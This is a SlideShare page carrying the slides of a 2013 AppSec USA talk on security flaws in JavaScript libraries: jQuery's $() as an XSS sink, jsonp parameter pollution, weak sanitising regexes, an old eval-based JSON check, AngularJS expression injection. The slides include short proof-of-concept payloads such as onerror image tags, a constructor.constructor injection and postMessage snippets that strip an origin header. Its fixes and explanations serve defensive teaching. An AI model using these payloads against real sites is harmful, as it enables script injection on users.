SlideShare ist ein Scribd-Unternehmen logo

JS Libraries Security Risks

D
drewz lin

This document summarizes Stefano di Paola's talk on security issues with JavaScript libraries. It discusses how jQuery's $() method can be considered a "sink" that executes HTML passed to it, including examples of XSS via jQuery selectors and AJAX calls. It also covers problems with JSON parsing regular expressions, AngularJS expression injection, and credentials exposed in URLs. Solutions proposed include validating all input, auditing third-party libraries, and moving away from approaches like eval() that execute untrusted code.

Technologie
1 von 41
Downloaden Sie, um offline zu lesen
JS Libraries Insecurity Appsec USA 2013 Stefano di Paola CTO @ Minded Security stefano.dipaola@mindedsecurity.com
/me whois • Research – OWASP-Italy Senior Member – Testing Guide Contributor – OWASP SWFIntruder – DOMinator (JavaScript Runtime Taint Engine) – Bug Hunter & Sec Research (Pdf Uxss, Flash Security, HPP) – Security Since '99 • Work – CTO @ Minded Security Application Security Consulting – Director of Minded Security Research Labs – Blog: http://blog.mindedsecurity.com – Twitter: @wisecwisec
Agenda • • • • • Intro JQuery JSON.js (OBG) AngularJS JS Libraries Management
About this talk • A wrap up of some interesting JS snippets • Reckless use of common libraries and third party scripts • Some unwitting one as well • Comes after 2.5 years developing/using DOMinator and DOMinatorPro
JQuery() is a Sink(?) • What's a Sink in Application Security? “..a function or method that can be considered unsecure when one of its arguments come from an untrusted input and is not correctly validated according to the layer the function is going to communicate to.“ • C's strcpy is a sink. strcpy(dst,src) • Java's jdbc.executeQuery is a sink executeQuery('select * from t where id='+str) • JQuery.html is a sink (and no one complains)
JQuery() more than a Sink • JQuery is More than a Sink! • Other sinks do only one thing. JQuery was designed to perform different operations based on the argument type and content. ● http://api.jquery.com/jQuery/
JQuery() more than a Sink • JQuery was written with flexibility in mind • But introduced a design issue that could be called a 'developer trust boundary violation'. – The principal use is for selecting elements (trusted) – ...and 'onload' callback execution(trusted) – The least one used is the actual sink method: jQuery( html [, ownerDocument ] ) Enough Words! Show Me The Code
JQuery() Concerns History • http://blog.mindedsecurity.com/2011/07/jquery-is-sink.html http://bugs.jquery.com/ticket/9521 «XSS with $(location.hash) and $(#<tag>) is needed?» ("fixed" (?)) • http://bugs.jquery.com/ticket/11773 « jQuery needs HTML escaping functionality » (undecided) • From reddit's jquery-migrate-is-sink-too: http://www.reddit.com/r/programming/comments/1cqno2/ «.. geocar - This is one of my biggest gripes about jQuery: Using the same interface for query and executing is a Bad Idea, that is, $ ("<script>alert(69)</script>") simply shouldn't do anything at all. ..» Actually doesn't but he got the point..) -> $("<img src='dd' onerror='alert(1)'>")
JQuery() as a Selector? • Might be considered as a potentially dangerous method ? – depends on how its results are further used. • It's more than querySelectorAll because there are features like: $("div:contains(" + word + ")") What if: word=),div[id=secret]:contains(cycleForDataExtr).. • If the results will affect something that is observable by an attacker, then we got a problem!
JQuery() Solution • JQuery Users: – Never Use jQuery() or $() with an unvalidated argument – No matter which version you are using! – Read the whole documentation, please! – And since the doc is never really complete, take some time to read the code! • JQuery Developers, please: – remove old versions (zip them all for reference) – Plan to change the jQuery do-everything behaviour to a dosimply-one-thing behavior.
JQuery.Ajax → HPP • $.ajax json(p) allows three ways to create a callback parameter: a. Explicit Callback Parameter in the url b. Explicit Callback Parameter in the object c. Callback Placeholder in the url $.ajax({url:"//host/index.html", data: "kwrds=ss&cb=test", //{cb:'test', kwrds: 'ss' } dataType:'jsonp', cache:true, success:function(){} }) $.ajax({url: '//host/index.html?kwrds=ss', jsonp: "cb", dataType: "jsonp", success: function() { } }) $.ajax({url: '//host/?kwrds=ss&cb=?', dataType: "jsonp", success: function() { } })
JQuery.Ajax Priority map • If there's HPP we can force the callback in the following cases: a(url) b(object) c(placehld) a(url) a c+'&'+a a+c b(object) b+'&'+a b c c(placehld) a+c c c Enough Words! Show Me The Code
JQuery.Ajax Solution • Be sure you're not allowing Client side HPP by: – Encoding tainted values with encodeURIComponent (remember it may trigger exception) try{ kw= encodeURIComponent(location.hash.slice(1)) url = 'kwrds='+kw $.ajax({ url: url, jsonp:'callback', …. }) }catch(e){ /*stop execution..blahblah*/ }
JQuery.html(RegEx pd) • Devs often use $.html() with untrusted input. • Sometimes they validate that using wrong regexps patterns. http://go.imgsmail.ru/js/unity.js?1308 h = /</?(.+?)/?>/ig; w.striptags = function(a, b) { var c = Array.isArray(b) ? b : null; return a.replace(h, c ? function(a, b) { return c.contains(b) ? a : "" } : "") }; • Fixed with: /</?([sS]+?)/?>/gi
JQuery.html(RegEx pd) • ..Or they unfortunately don't work as expected... http://ots.optimize.webtrends.com/ots/lib/3.2/wt_lib.js ... var test = z7696.location.search; } catch (z392c) { z82c5 = document; } ….. var z43ac = (zbea6.length - 1); var z33f9 = {}; for (var z205e = 0; z205e <= z43ac; z205e++) { var z6b05 = zbea6[z205e].split("="); z6b05[0] = unescape(z6b05[0]); z6b05[1] = unescape(z6b05[1]); z6b05[0] = z6b05[0].replace(/+/g, " "); z6b05[1] = z6b05[1].replace(/+/g, " "); z6b05[1] = z6b05[1].replace(/<.*?>/g, ""); z33f9[z6b05[0]] = z6b05[1]; ….
JQuery.html(RegEx pd) • ..Or they fortunately don't work as expected... var evil=false; var p1=/[";'<>@(){}!$^*-+|~`]/; // Regexp 4 special chars var p2=/(javascripts*:)|(alert)|/; // Regexp against XSS var url = location.href; if(url.match(p1) && url.match(p2)) // Fortunately Wrong!! evil=true; if(evil==false) div.innerHTML = url Enough Words! Show Me the Stuff!
JQuery.html(RegEx pd) solution Test those f#@#g RegExps!!!
JQuery.html(RegEx pd) solution Test those f#@#g RegExps!!! … OR NOT (if you are damn lucky!) Tip: If you're not a RegEx guru give a try to: http://www.debuggex.com
JQuery.ajax(Proxifyme) • Client Request Proxy – Feature of MS's LyncWeb – https://vi.ct.im/XXX/XFrame/XFrame.html – Yes, it's framable by design window.onmessage = function(e) { var requestInput = JSON.parse(e.data); var request = buildRequest(requestInput, e.source, e.origin); $.ajax(request); } – Let's have a look at the code!
JQuery.ajax(Proxifyme) • Attacker might just try to ask politely.. frame.location= "https://xxx/Autodiscover/XFrame/XFrame.html" var ob={ url:"/" } frame.postMessage(JSON.stringify(ob),"*") The code adds this unfriendly header: X-Ms-Origin: http://at.tack.er ..and the server unbelievably checks it! And returns 403.
JQuery.ajax(Proxifyme) • Attacker now asks less politely.. frame.location= "https://vi.ct.im/XXX/XFrame/XFrame.html" var ob={ url:"/", headers:{'X-Ms.Origin':'https://vi.ct.im'} } frame.postMessage(JSON.stringify(ob),"*") aaand... X-Ms-Origin: http://at.tack.er No success! Returns 403.
JQuery.ajax(Proxifyme) • Attacker now is a bit frustrated but wait...read the jQ doc! var ob={ accepts:, // cache:, // contentType:, // Whatever data:, // "p1=v1&p2=v2.." headers:, An object of additional header key/value pairs to send along with requests using the XMLHttpRequest transport. The header X-Requested-With: XMLHttpRequest is always added. but its default XMLHttpRequest value can be changed here. Values in the headers setting can also be overwritten from within the beforeSend function. (version added: 1.5) processData:, // urlencode or not. type, // GET , POST HEAD BLAH url, // Url. xhrFields:, //XMLHttpRequest.attr = val messageId: //Internal }
JQuery.ajax(Proxifyme) • Attacker now is less frustrated he can try something more: frame.location= "https://vi.ct.im/XXX/XFrame/XFrame.html" var ob={ url:"/", XhrFields:{setRequestHeader:void} } frame.postMessage(JSON.stringify(ob),"*") aand ciao ciao custom headers! • .. but there's more..
JQuery.ajax(Proxifyme) • Why does it work? Why doesn't it break the code? // Need an extra try/catch for cross domain requests in Firefox 3 try { for ( i in headers ) { xhr.setRequestHeader( i, headers[ i ] ); } }catch( _ ) {} We can actually add custom headers and block the X-MsOrigin!
JSON.js (OBG) • http://www.ietf.org/rfc/rfc4627.txt Security considerations (D. Crockford): «Generally there are security issues with scripting languages. JSON is a subset of JavaScript, but it is a safe subset that excludes assignment and invocation. A JSON text can be safely passed into JavaScript's eval() function (which compiles and executes a string) if all the characters not enclosed in strings are in the set of characters that form JSON tokens. This can be quickly determined in JavaScript with two regular expressions and calls to the test and replace methods. var my_JSON_object = !(/[^,:{}[]0-9.-+Eaeflnr-u nrt]/.test( text.replace(/"(.|[^"])*"/g, ''))) && eval('(' + text + ')'); Interoperability considerations: n/a Published specification: RFC 4627»
JSON.js (OBG) • Old JSON.js implementation: function jsonParse(string, secure) { if (secure && !/^[,:{}[]0-9.-+Eaeflnr-u nrt]*$/.test( string.replace(/./g, "@"). replace(/"[^"nr]*"/g, "")) ){ return null; } return eval("(" + string + ")"); } http://blog.mindedsecurity.com/2011/08/ye-olde-crockford-json-regexp-is.html
JSON.js (OBG) • parseJSON('a') is considered valid even if it's not JSON → a is actually eval'ed! • Eaeflnr-u part with no quotes let's you do this. • Next step is to see if there some standard object in window that matches the JSON regexp. for(var aa in window) if( aa.match(/^[,:{}[]0-9.-+Eaeflnr-u nrt]*$/)) console.log(""+aa) Results in: self status http://blog.mindedsecurity.com/2011/08/ye-olde-crockford-json-regexp-is.html
JSON.js (OBG) • Still there's a lot of problems since () = cannot be used! • But on IE...: // Courtesy of Eduardo `sirdarckcat` Vela Nava +{ "valueOf": self["location"], "toString": []["join"], 0: "javascript:alert(1)", length: 1 } is seen as valid JSON and
JSON.js (OBG)
JSON.js (OBG) • '' Ok ok but it's old stuff...right? ''
JSON.js (OBG) • '' Ok ok but it's old stuff...right? ''
JSON.js (OBG)
GWT's JSON safeToEval http://code.google.com/p/google-webtoolkit/source/browse/trunk/user/src/com/google/gwt/core/client/JsonUtils.java#78 /**    * Returns true if the given JSON string may be safely evaluated by {@code    * eval()} without undersired side effects or security risks. Note that a true    * result from this method does not guarantee that the input string is valid    * JSON.  This method does not consider the contents of quoted strings; it    * may still be necessary to perform escaping prior to evaluation for correct    * results.    *    * <p> The technique used is taken from <a href="http://www.ietf.org/rfc/rfc4627.txt">RFC 4627</a>.    */   public static native boolean safeToEval(String text) /*-{     // Remove quoted strings and disallow anything except:     //     // 1) symbols and brackets ,:{}[]     // 2) numbers: digits 0-9, ., -, +, e, and E     // 3) literal values: 'null', 'true' and 'false' = [aeflnr-u]     // 4) whitespace: ' ', 'n', 'r', and 't'     return !(/[^,:{}[]0-9.-+Eaeflnr-u nrt]/.test(text.replace(/"(.|[^"])*"/g, '')));   }-*/;  
JSON.js Solution • The new json.js uses a brand new regexp which "should" be safe • Or use json_parse.js which doesn't use eval. • ..or better use native methods JSON.parse / JSON.stringify if you can! • Finally, remember that after parsing you still have an unvalidated object! {"html":"<img src='s'onerror='XSSHere'>"}
3rd party services give 3rd party surprises • Omniture, Web Trends, Google Ads... • Several issues found and fixed • Web Trends is a web analytics service. • DEBUG version based on parameters → HTML Injection? http://www.microsoft.com/en-us/default.aspx? aaaa=11111111&gclid=1111&=&_wt.debug=2222&_wt.mode=preview&toJSON=4444&normal=9999&staging=a aaa&preview=bbbb&none=cccc&#bbbbb=2222222&%3Cs%3Essss (They know about it) + actually this requires popup blocker disabled Enough Words! Show Me The Code
3rd party services solution • Test and audit all the 3rd party libraries / js! • Do it periodically if they are external resources
Credentials in URL • http://user:pass@host.com/ • What can possibly go wrong with those? • Chrome is the last browser that transparently allows them • They are shown it to all location object
Credentials in URL • jQuery: rurl = /^([w+.-]+:)(?://([^/?#:]*)(?::(d+)|)|)/ – Nothing actually exploitable but: // A cross-domain request is in order when we have a protocol:host:port mismatch if ( s.crossDomain == null ) { parts = rurl.exec( s.url.toLowerCase() ) || false; s.crossDomain = parts && ( parts.join(":") + ( parts[ 3 ] ? "" : parts[ 1 ] === "http:" ? 80 : 443 ) ) !== ( ajaxLocParts.join(":") + ( ajaxLocParts[ 3 ] ? "" : ajaxLocParts[ 1 ] === "http:" ? 80 : 443 ) ); } Is kind of interesting.
AngularJS • Mustache + Expression Language → Interesting Injections • AngularJS uses stuff like: <div ng-init="some.js.code.here"> or {{constructor.constructor('alert(1)')()}} • AngularJS uses it's own parser (similar to Expression Language). • If there's an inection point, no actual antiXSS filter will be able to stop these attacks. • Credits to .Mario (MVCOMFG) and Kuza55 (https://communities.coverity.com/blogs/security/2013/04/23/angu lar-template-injection) as well for their awesome research on this topic!
Conclusions • JavaScript code can always be read so black box turns into white box analysis • JavaScript secure development is still not fully implemented even on companies that know about security. • JavaScript Developers can be super badass coders but also naives as well on some circumstances and their code is available for everyone. • Just scratched the surface of JavaScript security!
Thanks! Tnx! ^_^ Go and exploit /* ethically */ Q&A Mail: stefano.dipaola@mindedsecurity.com Twitter: wisecwisec

Empfohlen

New methods for exploiting ORM injections in Java applications
New methods for exploiting ORM injections in Java applicationsNew methods for exploiting ORM injections in Java applications
New methods for exploiting ORM injections in Java applicationsMikhail Egorov
 
주로사용되는 Xss필터와 이를 공격하는 방법
주로사용되는 Xss필터와 이를 공격하는 방법주로사용되는 Xss필터와 이를 공격하는 방법
주로사용되는 Xss필터와 이를 공격하는 방법guestad13b55
 
Building Advanced XSS Vectors
Building Advanced XSS VectorsBuilding Advanced XSS Vectors
Building Advanced XSS VectorsRodolfo Assis (Brute)
 
Maintainable JavaScript 2012
Maintainable JavaScript 2012Maintainable JavaScript 2012
Maintainable JavaScript 2012Nicholas Zakas
 
Harder Faster Stronger
Harder Faster StrongerHarder Faster Stronger
Harder Faster Strongersnyff
 
Performance patterns
Performance patternsPerformance patterns
Performance patternsStoyan Stefanov
 
Class-based views with Django
Class-based views with DjangoClass-based views with Django
Class-based views with DjangoSimon Willison
 
Unit Testing JavaScript Applications
Unit Testing JavaScript ApplicationsUnit Testing JavaScript Applications
Unit Testing JavaScript ApplicationsYnon Perek
 

Empfohlen

New methods for exploiting ORM injections in Java applications
New methods for exploiting ORM injections in Java applicationsNew methods for exploiting ORM injections in Java applications
New methods for exploiting ORM injections in Java applicationsMikhail Egorov
 
주로사용되는 Xss필터와 이를 공격하는 방법
주로사용되는 Xss필터와 이를 공격하는 방법주로사용되는 Xss필터와 이를 공격하는 방법
주로사용되는 Xss필터와 이를 공격하는 방법guestad13b55
 
Building Advanced XSS Vectors
Building Advanced XSS VectorsBuilding Advanced XSS Vectors
Building Advanced XSS VectorsRodolfo Assis (Brute)
 
Maintainable JavaScript 2012
Maintainable JavaScript 2012Maintainable JavaScript 2012
Maintainable JavaScript 2012Nicholas Zakas
 
Harder Faster Stronger
Harder Faster StrongerHarder Faster Stronger
Harder Faster Strongersnyff
 
Performance patterns
Performance patternsPerformance patterns
Performance patternsStoyan Stefanov
 
Class-based views with Django
Class-based views with DjangoClass-based views with Django
Class-based views with DjangoSimon Willison
 
Unit Testing JavaScript Applications
Unit Testing JavaScript ApplicationsUnit Testing JavaScript Applications
Unit Testing JavaScript ApplicationsYnon Perek
 
My app is secure... I think
My app is secure... I thinkMy app is secure... I think
My app is secure... I thinkWim Godden
 
Zepto.js, a jQuery-compatible mobile JavaScript framework in 2K
Zepto.js, a jQuery-compatible mobile JavaScript framework in 2KZepto.js, a jQuery-compatible mobile JavaScript framework in 2K
Zepto.js, a jQuery-compatible mobile JavaScript framework in 2KThomas Fuchs
 
Basic Tutorial of React for Programmers
Basic Tutorial of React for ProgrammersBasic Tutorial of React for Programmers
Basic Tutorial of React for ProgrammersDavid Rodenas
 
YSlow 2.0
YSlow 2.0YSlow 2.0
YSlow 2.0Stoyan Stefanov
 
QA for PHP projects
QA for PHP projectsQA for PHP projects
QA for PHP projectsMichelangelo van Dam
 
My app is secure... I think
My app is secure... I thinkMy app is secure... I think
My app is secure... I thinkWim Godden
 
Experienced Selenium Interview questions
Experienced Selenium Interview questionsExperienced Selenium Interview questions
Experienced Selenium Interview questionsarchana singh
 
Protractor Training in Pune by QuickITDotnet
Protractor Training in Pune by QuickITDotnet Protractor Training in Pune by QuickITDotnet
Protractor Training in Pune by QuickITDotnet QuickITDotNet Training and Services
 
jQuery Anti-Patterns for Performance & Compression
jQuery Anti-Patterns for Performance & CompressionjQuery Anti-Patterns for Performance & Compression
jQuery Anti-Patterns for Performance & CompressionPaul Irish
 
Automating Django Functional Tests Using Selenium on Cloud
Automating Django Functional Tests Using Selenium on CloudAutomating Django Functional Tests Using Selenium on Cloud
Automating Django Functional Tests Using Selenium on CloudJonghyun Park
 
ERRest - Designing a good REST service
ERRest - Designing a good REST serviceERRest - Designing a good REST service
ERRest - Designing a good REST serviceWO Community
 
the 5 layers of web accessibility - Open Web Camp II
the 5 layers of web accessibility - Open Web Camp IIthe 5 layers of web accessibility - Open Web Camp II
the 5 layers of web accessibility - Open Web Camp IIDirk Ginader
 
Scalable vector ember
Scalable vector emberScalable vector ember
Scalable vector emberMatthew Beale
 
HTML5: friend or foe (to Flash)?
HTML5: friend or foe (to Flash)?HTML5: friend or foe (to Flash)?
HTML5: friend or foe (to Flash)?Remy Sharp
 
My app is secure... I think
My app is secure... I thinkMy app is secure... I think
My app is secure... I thinkWim Godden
 
The DOM is a Mess @ Yahoo
The DOM is a Mess @ YahooThe DOM is a Mess @ Yahoo
The DOM is a Mess @ Yahoojeresig
 
UA testing with Selenium and PHPUnit - TrueNorthPHP 2013
UA testing with Selenium and PHPUnit - TrueNorthPHP 2013UA testing with Selenium and PHPUnit - TrueNorthPHP 2013
UA testing with Selenium and PHPUnit - TrueNorthPHP 2013Michelangelo van Dam
 
iOS 7 SDK特訓班
iOS 7 SDK特訓班iOS 7 SDK特訓班
iOS 7 SDK特訓班彼得潘 Pan
 
How to write easy-to-test JavaScript
How to write easy-to-test JavaScriptHow to write easy-to-test JavaScript
How to write easy-to-test JavaScriptYnon Perek
 
High Performance Django
High Performance DjangoHigh Performance Django
High Performance DjangoDjangoCon2008
 
Exch2010 compliance ngm f inal
Exch2010 compliance ngm f inalExch2010 compliance ngm f inal
Exch2010 compliance ngm f inalNathan Winters
 
Kemp exchange 2010_deployment_guide _v2.0
Kemp exchange 2010_deployment_guide _v2.0Kemp exchange 2010_deployment_guide _v2.0
Kemp exchange 2010_deployment_guide _v2.0Rodrigo Henriques
 

Weitere ähnliche Inhalte

Was ist angesagt?

My app is secure... I think
My app is secure... I thinkMy app is secure... I think
My app is secure... I thinkWim Godden
 
Zepto.js, a jQuery-compatible mobile JavaScript framework in 2K
Zepto.js, a jQuery-compatible mobile JavaScript framework in 2KZepto.js, a jQuery-compatible mobile JavaScript framework in 2K
Zepto.js, a jQuery-compatible mobile JavaScript framework in 2KThomas Fuchs
 
Basic Tutorial of React for Programmers
Basic Tutorial of React for ProgrammersBasic Tutorial of React for Programmers
Basic Tutorial of React for ProgrammersDavid Rodenas
 
My app is secure... I think
My app is secure... I thinkMy app is secure... I think
My app is secure... I thinkWim Godden
 
Experienced Selenium Interview questions
Experienced Selenium Interview questionsExperienced Selenium Interview questions
Experienced Selenium Interview questionsarchana singh
 
jQuery Anti-Patterns for Performance & Compression
jQuery Anti-Patterns for Performance & CompressionjQuery Anti-Patterns for Performance & Compression
jQuery Anti-Patterns for Performance & CompressionPaul Irish
 
Automating Django Functional Tests Using Selenium on Cloud
Automating Django Functional Tests Using Selenium on CloudAutomating Django Functional Tests Using Selenium on Cloud
Automating Django Functional Tests Using Selenium on CloudJonghyun Park
 
ERRest - Designing a good REST service
ERRest - Designing a good REST serviceERRest - Designing a good REST service
ERRest - Designing a good REST serviceWO Community
 
the 5 layers of web accessibility - Open Web Camp II
the 5 layers of web accessibility - Open Web Camp IIthe 5 layers of web accessibility - Open Web Camp II
the 5 layers of web accessibility - Open Web Camp IIDirk Ginader
 
Scalable vector ember
Scalable vector emberScalable vector ember
Scalable vector emberMatthew Beale
 
HTML5: friend or foe (to Flash)?
HTML5: friend or foe (to Flash)?HTML5: friend or foe (to Flash)?
HTML5: friend or foe (to Flash)?Remy Sharp
 
My app is secure... I think
My app is secure... I thinkMy app is secure... I think
My app is secure... I thinkWim Godden
 
The DOM is a Mess @ Yahoo
The DOM is a Mess @ YahooThe DOM is a Mess @ Yahoo
The DOM is a Mess @ Yahoojeresig
 
UA testing with Selenium and PHPUnit - TrueNorthPHP 2013
UA testing with Selenium and PHPUnit - TrueNorthPHP 2013UA testing with Selenium and PHPUnit - TrueNorthPHP 2013
UA testing with Selenium and PHPUnit - TrueNorthPHP 2013Michelangelo van Dam
 
How to write easy-to-test JavaScript
How to write easy-to-test JavaScriptHow to write easy-to-test JavaScript
How to write easy-to-test JavaScriptYnon Perek
 
High Performance Django
High Performance DjangoHigh Performance Django
High Performance DjangoDjangoCon2008
 

Was ist angesagt? (20)

My app is secure... I think
My app is secure... I thinkMy app is secure... I think
My app is secure... I think
 
Zepto.js, a jQuery-compatible mobile JavaScript framework in 2K
Zepto.js, a jQuery-compatible mobile JavaScript framework in 2KZepto.js, a jQuery-compatible mobile JavaScript framework in 2K
Zepto.js, a jQuery-compatible mobile JavaScript framework in 2K
 
Basic Tutorial of React for Programmers
Basic Tutorial of React for ProgrammersBasic Tutorial of React for Programmers
Basic Tutorial of React for Programmers
 
YSlow 2.0
YSlow 2.0YSlow 2.0
YSlow 2.0
 
QA for PHP projects
QA for PHP projectsQA for PHP projects
QA for PHP projects
 
My app is secure... I think
My app is secure... I thinkMy app is secure... I think
My app is secure... I think
 
Experienced Selenium Interview questions
Experienced Selenium Interview questionsExperienced Selenium Interview questions
Experienced Selenium Interview questions
 
Protractor Training in Pune by QuickITDotnet
Protractor Training in Pune by QuickITDotnet Protractor Training in Pune by QuickITDotnet
Protractor Training in Pune by QuickITDotnet
 
jQuery Anti-Patterns for Performance & Compression
jQuery Anti-Patterns for Performance & CompressionjQuery Anti-Patterns for Performance & Compression
jQuery Anti-Patterns for Performance & Compression
 
Automating Django Functional Tests Using Selenium on Cloud
Automating Django Functional Tests Using Selenium on CloudAutomating Django Functional Tests Using Selenium on Cloud
Automating Django Functional Tests Using Selenium on Cloud
 
ERRest - Designing a good REST service
ERRest - Designing a good REST serviceERRest - Designing a good REST service
ERRest - Designing a good REST service
 
the 5 layers of web accessibility - Open Web Camp II
the 5 layers of web accessibility - Open Web Camp IIthe 5 layers of web accessibility - Open Web Camp II
the 5 layers of web accessibility - Open Web Camp II
 
Scalable vector ember
Scalable vector emberScalable vector ember
Scalable vector ember
 
HTML5: friend or foe (to Flash)?
HTML5: friend or foe (to Flash)?HTML5: friend or foe (to Flash)?
HTML5: friend or foe (to Flash)?
 
My app is secure... I think
My app is secure... I thinkMy app is secure... I think
My app is secure... I think
 
The DOM is a Mess @ Yahoo
The DOM is a Mess @ YahooThe DOM is a Mess @ Yahoo
The DOM is a Mess @ Yahoo
 
UA testing with Selenium and PHPUnit - TrueNorthPHP 2013
UA testing with Selenium and PHPUnit - TrueNorthPHP 2013UA testing with Selenium and PHPUnit - TrueNorthPHP 2013
UA testing with Selenium and PHPUnit - TrueNorthPHP 2013
 
iOS 7 SDK特訓班
iOS 7 SDK特訓班iOS 7 SDK特訓班
iOS 7 SDK特訓班
 
How to write easy-to-test JavaScript
How to write easy-to-test JavaScriptHow to write easy-to-test JavaScript
How to write easy-to-test JavaScript
 
High Performance Django
High Performance DjangoHigh Performance Django
High Performance Django
 

Andere mochten auch

Exch2010 compliance ngm f inal
Exch2010 compliance ngm f inalExch2010 compliance ngm f inal
Exch2010 compliance ngm f inalNathan Winters
 
Kemp exchange 2010_deployment_guide _v2.0
Kemp exchange 2010_deployment_guide _v2.0Kemp exchange 2010_deployment_guide _v2.0
Kemp exchange 2010_deployment_guide _v2.0Rodrigo Henriques
 
Nathan Winters TechDays UK Exchange 2010 IPC
Nathan Winters TechDays UK Exchange 2010 IPCNathan Winters TechDays UK Exchange 2010 IPC
Nathan Winters TechDays UK Exchange 2010 IPCNathan Winters
 
Invited Talk - Cyber Security and Open Source
Invited Talk - Cyber Security and Open SourceInvited Talk - Cyber Security and Open Source
Invited Talk - Cyber Security and Open Sourcehack33
 
Appsec 2013-krehel-ondrej-forensic-investigations-of-web-exploitations
Appsec 2013-krehel-ondrej-forensic-investigations-of-web-exploitationsAppsec 2013-krehel-ondrej-forensic-investigations-of-web-exploitations
Appsec 2013-krehel-ondrej-forensic-investigations-of-web-exploitationsdrewz lin
 
Exploiting Llinux Environment
Exploiting Llinux EnvironmentExploiting Llinux Environment
Exploiting Llinux EnvironmentEnrico Scapin
 
Exchange online real world migration challenges
Exchange online real world migration challengesExchange online real world migration challenges
Exchange online real world migration challengesSteve Goodman
 
Taking the Fear out of WAF
Taking the Fear out of WAFTaking the Fear out of WAF
Taking the Fear out of WAFBrian A. McHenry
 
Packet analysis (Basic)
Packet analysis (Basic)Packet analysis (Basic)
Packet analysis (Basic)Ammar WK
 
Fundamentals of Linux Privilege Escalation
Fundamentals of Linux Privilege EscalationFundamentals of Linux Privilege Escalation
Fundamentals of Linux Privilege Escalationnullthreat
 
F5 Networks: Introduction to Silverline WAF (web application firewall)
F5 Networks: Introduction to Silverline WAF (web application firewall)F5 Networks: Introduction to Silverline WAF (web application firewall)
F5 Networks: Introduction to Silverline WAF (web application firewall)F5 Networks
 
Mediapresentatie econopolis
Mediapresentatie econopolisMediapresentatie econopolis
Mediapresentatie econopolisimec.archive
 
F5 ASM v12 DDoS best practices
F5 ASM v12 DDoS best practices F5 ASM v12 DDoS best practices
F5 ASM v12 DDoS best practices Lior Rotkovitch
 

Andere mochten auch (19)

Exch2010 compliance ngm f inal
Exch2010 compliance ngm f inalExch2010 compliance ngm f inal
Exch2010 compliance ngm f inal
 
Kemp exchange 2010_deployment_guide _v2.0
Kemp exchange 2010_deployment_guide _v2.0Kemp exchange 2010_deployment_guide _v2.0
Kemp exchange 2010_deployment_guide _v2.0
 
Nathan Winters TechDays UK Exchange 2010 IPC
Nathan Winters TechDays UK Exchange 2010 IPCNathan Winters TechDays UK Exchange 2010 IPC
Nathan Winters TechDays UK Exchange 2010 IPC
 
Invited Talk - Cyber Security and Open Source
Invited Talk - Cyber Security and Open SourceInvited Talk - Cyber Security and Open Source
Invited Talk - Cyber Security and Open Source
 
Appsec 2013-krehel-ondrej-forensic-investigations-of-web-exploitations
Appsec 2013-krehel-ondrej-forensic-investigations-of-web-exploitationsAppsec 2013-krehel-ondrej-forensic-investigations-of-web-exploitations
Appsec 2013-krehel-ondrej-forensic-investigations-of-web-exploitations
 
Exploiting Llinux Environment
Exploiting Llinux EnvironmentExploiting Llinux Environment
Exploiting Llinux Environment
 
Take a REST!
Take a REST!Take a REST!
Take a REST!
 
Exchange online real world migration challenges
Exchange online real world migration challengesExchange online real world migration challenges
Exchange online real world migration challenges
 
Death of WAF - GoSec '15
Death of WAF - GoSec '15Death of WAF - GoSec '15
Death of WAF - GoSec '15
 
Taking the Fear out of WAF
Taking the Fear out of WAFTaking the Fear out of WAF
Taking the Fear out of WAF
 
Configuration F5 BIG IP ASM v12
Configuration F5 BIG IP ASM v12Configuration F5 BIG IP ASM v12
Configuration F5 BIG IP ASM v12
 
Packet analysis (Basic)
Packet analysis (Basic)Packet analysis (Basic)
Packet analysis (Basic)
 
Fundamentals of Linux Privilege Escalation
Fundamentals of Linux Privilege EscalationFundamentals of Linux Privilege Escalation
Fundamentals of Linux Privilege Escalation
 
F5 Networks: Introduction to Silverline WAF (web application firewall)
F5 Networks: Introduction to Silverline WAF (web application firewall)F5 Networks: Introduction to Silverline WAF (web application firewall)
F5 Networks: Introduction to Silverline WAF (web application firewall)
 
Prepare Yourself to Become Infosec Professional
Prepare Yourself to Become Infosec ProfessionalPrepare Yourself to Become Infosec Professional
Prepare Yourself to Become Infosec Professional
 
My pwk & oscp journey
My pwk & oscp journeyMy pwk & oscp journey
My pwk & oscp journey
 
F5 TLS & SSL Practices
F5 TLS & SSL PracticesF5 TLS & SSL Practices
F5 TLS & SSL Practices
 
Mediapresentatie econopolis
Mediapresentatie econopolisMediapresentatie econopolis
Mediapresentatie econopolis
 
F5 ASM v12 DDoS best practices
F5 ASM v12 DDoS best practices F5 ASM v12 DDoS best practices
F5 ASM v12 DDoS best practices
 

Ähnlich wie JS Libraries Security Risks

JavaScript Performance Patterns
JavaScript Performance PatternsJavaScript Performance Patterns
JavaScript Performance PatternsStoyan Stefanov
 
JavaScript performance patterns
JavaScript performance patternsJavaScript performance patterns
JavaScript performance patternsStoyan Stefanov
 
Server Side JavaScript - You ain't seen nothing yet
Server Side JavaScript - You ain't seen nothing yetServer Side JavaScript - You ain't seen nothing yet
Server Side JavaScript - You ain't seen nothing yetTom Croucher
 
Testing ASP.NET - Progressive.NET
Testing ASP.NET - Progressive.NETTesting ASP.NET - Progressive.NET
Testing ASP.NET - Progressive.NETBen Hall
 
Hacking Adobe Experience Manager sites
Hacking Adobe Experience Manager sitesHacking Adobe Experience Manager sites
Hacking Adobe Experience Manager sitesMikhail Egorov
 
Доклад Михаила Егорова на PHDays
Доклад Михаила Егорова на PHDaysДоклад Михаила Егорова на PHDays
Доклад Михаила Егорова на PHDaysru_Parallels
 
Testing Ext JS and Sencha Touch
Testing Ext JS and Sencha TouchTesting Ext JS and Sencha Touch
Testing Ext JS and Sencha TouchMats Bryntse
 
Java script unit testing
Java script unit testingJava script unit testing
Java script unit testingMats Bryntse
 
WebNet Conference 2012 - Designing complex applications using html5 and knock...
WebNet Conference 2012 - Designing complex applications using html5 and knock...WebNet Conference 2012 - Designing complex applications using html5 and knock...
WebNet Conference 2012 - Designing complex applications using html5 and knock...Fabio Franzini
 
SharePoint and jQuery Essentials
SharePoint and jQuery EssentialsSharePoint and jQuery Essentials
SharePoint and jQuery EssentialsMark Rackley
 
Introduction to jQuery
Introduction to jQueryIntroduction to jQuery
Introduction to jQueryAlek Davis
 
jQuery Makes Writing JavaScript Fun Again (for HTML5 User Group)
jQuery Makes Writing JavaScript Fun Again (for HTML5 User Group)jQuery Makes Writing JavaScript Fun Again (for HTML5 User Group)
jQuery Makes Writing JavaScript Fun Again (for HTML5 User Group)Doris Chen
 
Sandboxing JS and HTML. A lession Learned
Sandboxing JS and HTML. A lession LearnedSandboxing JS and HTML. A lession Learned
Sandboxing JS and HTML. A lession LearnedMinded Security
 
CBDW2014 - MockBox, get ready to mock your socks off!
